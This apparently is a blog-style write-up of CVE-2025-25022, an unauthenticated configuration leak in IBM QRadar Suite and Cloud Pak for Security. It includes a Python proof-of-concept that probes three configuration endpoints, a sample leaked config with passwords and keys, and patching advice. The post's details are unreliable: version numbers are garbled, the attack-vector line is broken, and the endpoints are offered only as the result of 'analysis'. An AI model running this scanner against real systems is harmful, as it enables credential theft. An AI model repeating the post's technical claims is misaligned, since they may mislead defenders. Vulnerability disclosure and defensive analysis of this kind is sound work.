CVE-2025-25022 - Info Leak in IBM QRadar Suite & Cloud Pak for Security – Exploit & Analysis

A new critical vulnerability, CVE-2025-25022, has shaken the cybersecurity world. This flaw affects IBM QRadar Suite Software versions 1.10.12. through 1.11.2. and IBM Cloud Pak for Security versions 1.10.. through 1.10.11., putting highly sensitive information at risk. An unauthenticated attacker—someone who doesn't need to sign in—can access secret data from configuration files.

This is a big deal for companies running these products. In this post, we break down what this vulnerability is, show you how it can be exploited (with examples), and give you links for reference.

Attack Vector: Remote but limited to unable to authenticate

- Severity: High / Critical (unauthenticated info disclosure)

Why Does It Matter?

Attackers who exploit this bug don’t need a username or password. If your systems are exposed, sensitive information can leak with a single request. That data can be used for deeper attacks.

The Core Issue

The problem lies in improperly protected configuration endpoints. Some API calls or URLs return configuration files without proper access checks.

Based on analysis, the flaw lives in endpoints like

GET /api/configuration/files
GET /config/export
GET /internal/settings.yaml

These endpoints should require authentication, but the affected versions allow unauthenticated access.

Proof of Concept Exploit

Let’s look at a sample Python script that shows how simple exploiting this can be.

import requests

TARGET = "https://vulnerable-qradar.example.com";

endpoints = [
    "/api/configuration/files",
    "/config/export",
    "/internal/settings.yaml"
]

for endpoint in endpoints:
    url = TARGET + endpoint
    resp = requests.get(url, verify=False)
    if resp.status_code == 200:
        print(f"[+] Found config data at: {endpoint}")
        print(resp.text[:100])  # Print only first 100 characters
    else:
        print(f"[-] No data at: {endpoint}")

What this does:
Tries three known endpoints and prints any data it gets back. You’ll often see YAML, JSON, or text files that include secrets.

NOTE: Always get legal permission before testing!

A returned config might look like this

db:
  username: admin
  password: SuperSecret123
  host: 10.10.10.5

api:
  key: 8f2a4b19-11a4-493-9188-dfdcodeexample1

session:
  secret_key: zxcvbnmasdfghjklqwertyuiop12345

Attackers can now log into your database, or abuse API keys elsewhere.

2. Mitigation Steps

- Update Immediately: IBM has released patches. Update to QRadar Suite 1.11.3. or later and Cloud Pak for Security 1.10.12. or later.

Official IBM Security Bulletin

https://www.ibm.com/support/pages/node/7116775

Reference Links

- IBM Security Bulletin for QRadar Suite (CVE-2025-25022)
- IBM Security Bulletin for Cloud Pak for Security (CVE-2025-25022)
- NIST NVD Entry for CVE-2025-25022 (forthcoming)
- IBM QRadar Suite Documentation
- IBM Cloud Pak for Security Documentation

Conclusion

CVE-2025-25022 is dangerously simple to exploit and can expose the soft underbelly of your IBM QRadar and Cloud Pak setups. Take this vulnerability seriously: patch today, review your logs, rotate your secrets, and audit who can reach your config files. Don't give attackers a free pass to your most sensitive information.

Timeline

Published on: 06/03/2025 16:15:24 UTC
Last modified on: 06/04/2025 14:54:33 UTC